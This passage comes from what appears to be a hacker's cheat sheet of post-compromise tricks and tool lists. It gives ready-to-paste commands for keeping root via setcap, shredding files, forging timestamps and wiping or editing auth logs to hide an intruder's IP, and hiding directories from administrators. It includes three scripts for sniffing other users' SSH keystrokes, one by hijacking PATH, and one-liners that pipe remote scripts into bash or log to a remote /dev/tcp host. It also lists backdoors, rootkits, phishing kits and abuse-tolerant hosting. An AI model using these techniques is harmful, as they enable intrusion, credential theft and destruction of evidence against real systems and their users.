curl http://127.0.0.1:8080/test.php -d 0="ps fax; uname -mrs; id"
Stay root once you got root
### Execute as root user
setcap cap_setuid+ep /lib/x86_64-linux-gnu/ld-linux-x86-64.so.2
Become root
### Execute as non-root user
/lib/x86_64-linux-gnu/ld-linux-x86-64.so.2 /usr/bin/python3 -c 'import os;os.setuid(0);os.system("/bin/bash")'
7. Shell Hacks
shred -z foobar.txt
## SHRED without shred command
shred()
{
[[ -z $1 || ! -f "$1" ]] && { echo >&2 "shred [FILE]"; return 255; }
dd bs=1k count=$(du -sk ${1:?} | cut -f1) if=/dev/urandom >"$1"
rm -f "${1:?}"
}
shred foobar.txt
Note: Or deploy your files in /dev/shm directory so that no data is written to the harddrive. Data will be deleted on reboot.
Note: Or delete the file and then fill the entire harddrive with /dev/urandom and then rm -rf the dump file.
7.ii. Restore the date of a file
Let's say you have modified /etc/passwd but the file date now shows that /etc/passwd has been modifed. Use touch to change the file data to the date of another file (in this example, /etc/shadow)
touch -r /etc/shadow /etc/passwd
This will reset the logfile to 0 without having to restart syslogd etc:
>/var/log/auth.log # or on old shells: cat /dev/null >/var/log/auth.log
This will remove any line containing the IP 1.2.3.4
from the log file:
#DEL=thc.org
#DEL=${SSH_CLIENT%% *}
DEL=1.2.3.4
LOG=/var/log/auth.log
IFS="" a=$(sed "/${DEL}/d" <"${LOG}") && echo "$a">"${LOG}"
7.iv. Hide files from that User without root privileges
Our favorite working directory is /dev/shm/. This location is volatile memory and will be lost on reboot. NO LOGZ == NO CRIME.
Hiding permanent files:
Method 1:
alias ls='ls -I system-dev'
This will hide the directory system-dev from the ls command. Place in User's ~/.profile or system wide /etc/profile.
Method 2: Tricks from the 80s. Consider any directory that the admin rarely looks into (like /boot/.X11/.. or so):
mkdir '...'
cd '...'
Method 3: Unix allows filenames with about any ASCII character but 0x00. Try tab (\t). Happens that most Admins do not know how to cd into any such directory.
mkdir $'\t'
cd $'\t'
# Find out Linux Distribution
uname -a; lsb_release -a; cat /etc/*release /etc/issue* /proc/version
# Speed check the system
curl -sL bench.sh | bash
# Another speed check:
# curl -sL yabs.sh | bash
8. Crypto
8.i. Generate quick random Password
Good for quick passwords without human element.
openssl rand -base64 24
If openssl
is not available then we can also use head
to read from /dev/urandom
.
head -c 32 < /dev/urandom | xxd -p -c 32
or make it alpha-numeric
head -c 32 < /dev/urandom | base64 | tr -dc '[:alnum:]' | head -c 16
8.ii.a. Linux transportable encrypted filesystems - cryptsetup
Create a 256MB large encrypted file system. You will be prompted for a password.
dd if=/dev/urandom of=/tmp/crypted bs=1M count=256 iflag=fullblock
cryptsetup luksFormat /tmp/crypted
mkfs.ext3 /tmp/crypted
Mount:
losetup -f
losetup /dev/loop0 /tmp/crypted
cryptsetup open /dev/loop0 crypted
mount -t ext3 /dev/mapper/crypted /mnt/crypted
Store data in /mnt/crypted
, then unmount:
umount /mnt/crypted
cryptsetup close crypted
losetup -d /dev/loop0
8.ii.b. Linux transportable encrypted filesystems - EncFS
Create .sec
and store the encrypted data in .raw
:
mkdir .raw .sec
encfs --standard "${PWD}/.raw" "${PWD}/.sec"
unmount:
fusermount -u .sec
Encrypt your 0-Days and log files before transfering them - please. (and pick your own password):
# Encrypt
openssl enc -aes-256-cbc -pbkdf2 -k fOUGsg1BJdXPt0CY4I <input.txt >input.txt.enc
# Decrypt
openssl enc -d -aes-256-cbc -pbkdf2 -k fOUGsg1BJdXPt0CY4I <input.txt.enc >input.txt
9. SSH Sniffing
9.i Sniff a user's SSH session with strace
strace -e trace=read -p <PID> 2>&1 | while read x; do echo "$x" | grep '^read.*= [1-9]$' | cut -f2 -d\"; done
Dirty way to monitor a user who is using ssh to connect to another host from a computer that you control.
9.ii Sniff a user's SSH session with script
The tool 'script' has been part of Unix for decades. Add 'script' to the user's .profile. The user's keystrokes and session will be recorded to ~/.ssh-log.txt the next time the user logs in:
echo 'exec script -qc /bin/bash ~/.ssh-log.txt' >>~/.profile
Consider using zap-args to hide the the arguments and /dev/tcp/3.13.3.7/1524 as an output file to log to a remote host.
9.iii. Sniff a user's SSH session with a wrapper script
Even dirtier way in case /proc/sys/kernel/yama/ptrace_scope is set to 1 (strace will fail on already running SSH clients unless uid=0)
Create a wrapper script called 'ssh' that executes strace + ssh to log the session:
Show wrapper script - CLICK HERE
# Cut & Paste the following into a bash shell:
# Add a local path to the PATH variable so our 'ssh' is executed instead of the real ssh:
echo 'PATH=~/.local/bin:$PATH #0xFD0E' >>~/.profile
# Create a log directory and our own ssh binary
mkdir -p ~/.local/bin ~/.local/logs
cat <<__EOF__ >~/.local/bin/ssh
#! /bin/bash
strace -e trace=read -I 1 -o '! ~/.local/bin/ssh-log \$\$' /usr/bin/ssh \$@
__EOF__
cat <<__EOF__ >~/.local/bin/ssh-log
#! /bin/bash
grep -F 'read(4' | cut -f2 -d\\" | while read -r x; do
[[ \${#x} -gt 5 ]] && continue
[[ \${x} == +(\\\\n|\\\\r) ]] && { echo ""; continue; }
echo -n "\${x}"
done >\$HOME/.local/logs/ssh-log-"\${1}"-\`date +%s\`.txt
__EOF__
chmod 755 ~/.local/bin/ssh ~/.local/bin/ssh-log
. ~/.profile
echo -e "\033[1;32m***SUCCESS***.
Logfiles stored in ~/.local/.logs/.
To uninstall cut & paste this\033[0m:\033[1;36m
grep -v 0xFD0E ~/.profile >~/.profile-new && mv ~/.profile-new ~/.profile
rm -rf ~/.local/bin/ssh ~/.local/bin/ssh-log ~/.local/logs/ssh-log*.txt
rmdir ~/.local/bin ~/.local/logs ~/.local &>/dev/null \033[0m"
(thanks to Gerald for testing this)
The SSH session will be sniffed and logged to ~/.ssh/logs/ the next time the user logs into his shell and uses SSH.
9.iv Sniff a user's SSH session using SSH-IT
The easiest way is using https://www.thc.org/ssh-it/.
bash -c "$(curl -fsSL ssh-it.thc.org/x)"
10. VPN & Shells
$ ssh [email protected] # Use password 'segfault'
Trusted VPN Providers
- https://www.mullvad.net
- https://www.cryptostorm.is
- https://proton.me - Offers FREE VPN
- https://vpn.fail - Run by volunteers
Virtual Private Servers
- https://www.hetzner.com - Cheap
- https://dmzhost.co - Ignore most abuse requests
- https://alexhost.com - DMCA free zone
- https://basehost.eu - Ignores court orders
- https://buyvm.net - Warez best friend
- https://serverius.net - Used by gangsters
- https://1984.hosting - Privacy
- https://bithost.io - Reseller for DigitalOcean, Linode, Hetzner and Vultr (accepts Crypto)
- https://www.privatelayer.com - Swiss based.
Proxies (we dont use any of those)
- V2Ray Proxies
- Hola Proxies
- Zaeem's Free Proxy List
- Proxy Broker 2
- proxyscrape.com
- my-proxy.com
- getfreeproxylists.blogspot.com
- proxypedia.org
- socks-proxy.net
- Segfault:
curl -x socks5h://$(PROXY) ipinfo.io
- selects a random proxy for every request
Many other services (for free)
11. Intelligence Gathering
OSINT Hacker Tools | |
---|---|
https://osint.sh | Free. Subdomain Finder, DNS History, Public S3 Buckets, Reverse IP, Certificate Search and much more |
https://cli.fyi | Free. curl/json interface to many services. Try curl cli.fyi/me or curl cli.fyi/thc.org . |
https://hackertarget.com/ip-tools/ | Free OSINT Service (Reverse IP, MTR, port scan, CMS scans, Vulnerability Scans, API support) |
https://account.shodan.io/billing/tour | Open Port DB & DNS Lookup from around the world |
https://dnsdumpster.com/ | Domain Recon Tool |
https://crt.sh/ | TLS Certificate Search |
https://archive.org/web/ | Historical view of websites |
https://www.farsightsecurity.com/solutions/dnsdb/ | DNS search (not free) |
https://wigle.net/ | Wireless Network Mapper |
https://radiocells.org/ | Cell Tower Informations |
https://www.shodan.io/ | Search Engine to find devices & Banners (not free) |
https://spur.us/context/me | IP rating https://spur.us/context/<IP> |
http://drs.whoisxmlapi.com | Reverse Whois Lookup (not free) |
https://www.abuseipdb.com | IP abuse rating |
OSINT for Detectives | |
---|---|
https://start.me/p/rx6Qj8/nixintel-s-osint-resource-list | Nixintel's OSINT Resource List |
https://github.com/jivoi/awesome-osint | Awesome OSINT list |
https://cipher387.github.io/osint_stuff_tool_collection/ | OSINT tools collection |
https://osintframework.com/ | Many OSINT tools |
OSINT Databases | |
---|---|
https://data.ddosecrets.com/ | Database Dumps |
12. Miscellaneous
Comms
- CryptoStorm Email - Disposable emails (send & receive). (List of Disposable-email-services).
- Temp-Mail - Disposable email service with great Web GUI. Receive only.
- Quackr.Io - Disposable SMS/text messages (List of Disposable-SMS-services).
- Crypton - Rent a private SIM/SMS with crypto (.onion)
OpSec
- OpSec for Rebellions - Start Here. The simplest 3 steps.
- RiseUp - Mail, VPN and Tips for (online) rebellions.
- Neko - Launch Firefox in Docker and access via 127.0.0.1:8080 (WebRTC)
- x11Docker - Isolate any X11 app in a container (Linux & Windows only). (Article)
- DangerZone - Make PDFs safe before opening them.
- ExifTool - Remove meta data from files (
exiftool -all= example.pdf example1.jpg ...
) - EFF - Clever advise for freedom figthers.
Exploits
- Traitor - Tries various exploits/vulnerabilities to gain root (LPE)
- PacketStorm - Our favorite site ever since we shared a Pizza with fringe[at]dtmf.org in NYC in 2000
- ExploitDB - Also includes metasploit db and google hacking db
- Shodan/Exploits - Similar to exploit-db
System Information Gathering
- https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS - Quick system informations for hackers.
- https://github.com/zMarch/Orc - Post-exploit tool to find local RCE (type
getexploit
after install)
Backdoors
- https://www.gsocket.io/deploy - The world's smallest backdoor
- https://github.com/m0nad/Diamorphine - Linux Kernel Module for hiding processes and files
- https://www.kali.org/tools/weevely - PHP backdoor
Network Scanners
- https://github.com/robertdavidgraham/masscan - Scan the entire Internet
- https://github.com/ptrrkssn/pnscan - Fast network scanner
- https://zmap.io/ - ZMap & ZGrab
Vulnerability Scanners
- Raccoon - Reconnaissance and Information Gathering
- Osmedeus - Vulnerability and Information gathering
- FullHunt - log4j and spring4shell scanner
DDoS
- DeepNet - we despise DDoS but if we had to then this would be our choice.
Static Binaries / Warez
- https://github.com/andrew-d/static-binaries/tree/master/binaries/linux/x86_64
- https://iq.thc.org/cross-compiling-exploits
Phishing
- https://github.com/htr-tech/zphisher - We don't hack like this but this is what we would use.
- https://da.gd/ - Tinier TinyUrl and allows https://[email protected]/blah
Tools
- https://github.com/guitmz/ezuri - Obfuscate Linux binaries
- https://tmate.io/ - Share A screen with others
Callback / Canary / Command & Control
Tunneling
- Gost
- TCP Gender Changer for all your 'connect back' needs.
- ngrok, cloudflared or pagekite to make a server behind NAT accessible from the public Internet.
- Blitz -
blitz -l
/blitz foo.txt
- Mega
- oshiAt - also on TOR.
curl -T foo.txt https://oshi.at
- Transfer.sh -
curl -T foo.txt https://transfer.sh
- LitterBox -
curl -F reqtype=fileupload -F time=72h -F '[email protected]' https://litterbox.catbox.moe/resources/internals/api.php
- Croc -
croc send foo.txt / croc anit-price-example
- MagicWormhole
Publishing
- free BT/DC/eD2k seedbox
- Or use /onion on segfault.net or plain old https with ngrok.
- DuckDNS - Free Dynamic Domain Names
- afraid.org - Free Dynamic DNS for your domain
- he.net - Free Nameserver service
- 0bin / paste.ec - Encrypted PasteBin
Forums and Conferences
- 0x00Sec - Reverse Engineering & Hacking with a pinch of Malware
- AlligatorCon - the original
- 0x41con
- TumpiCon
- The Hacker's Choice
- The Hacker News
- CyberSecurity Technologies
- Offensive Twitter
- Pwn3rzs
- VX-Underground
- cKure
- Android Security / Malware
- OSINT CyberDetective
- BookZillaaa
Mindmaps & Knowledge
- https://jvns.ca/blog/2022/04/12/a-list-of-new-ish--command-line-tools/
- https://github.com/ibraheemdev/modern-unix
Tmux Cheat Sheet | |
---|---|
Save Scrollback | Ctrl+b + : , then type capture-pane -S - followed by Ctrl+b + : and type save-buffer filename.txt . |
Attach | Start a new tmux, then type Ctrl+b + s and use LEFT , RIGHT to expand and select any session. |
Logging | Ctrl+b + Shift + P to start and stop. |
Menu | Ctrl+b + > . Then use Ctrl+b + UP , DOWN , LEFT or RIGHT to move between the panes. |
Use lsof -Pni
or netstat -putan
(or ss -putan
) to list all Internet (-tu) connections.
Use ss -lntp
to show all listening (-l) TCP (-t) sockets.
Use netstat -rn
or ip route show
to show default Internet route.
Use curl cheat.sh/tar
to get TLDR help for tar. Works with any other linux command.
Use curl -fsSL bench.sh | bash
to speed test a server.
Hacking over long latency links or slow links can be frustrating. Every keystroke is transmitted one by one and any typo becomes so much more frustrating and time consuming to undo. rlwrap comes to the rescue. It buffers all single keystrokes until Enter is hit and then transmits the entire line at once. This makes it so much easier to type at high speed, correct typos, ...
Example for the receiving end of a revese tunnel:
rlwrap --always-readline nc -vnlp 1524
Example for SSH:
rlwrap --always-readline ssh user@host
13. Other Sites
- Hacking HackingTeam - a HackBack - Old but real talent at work.
- Guacamaya Hackback
- Vx Underground
- HTB absolute - Well written and explained attack.
- Conti Leak - Windows hacking. Pragmatic.
- Red Team Notes
- HackTricks
- Awesome Red Teaming
- VulHub - Test your exploits
- Qubes-OS - Desktop OS focused on security with XEN isolated (disposable) guest VMs (Fedora, Debian, Whonix out of the box)
Shoutz: ADM, subz/#9x, DrWho, spoty Join us on Telegram.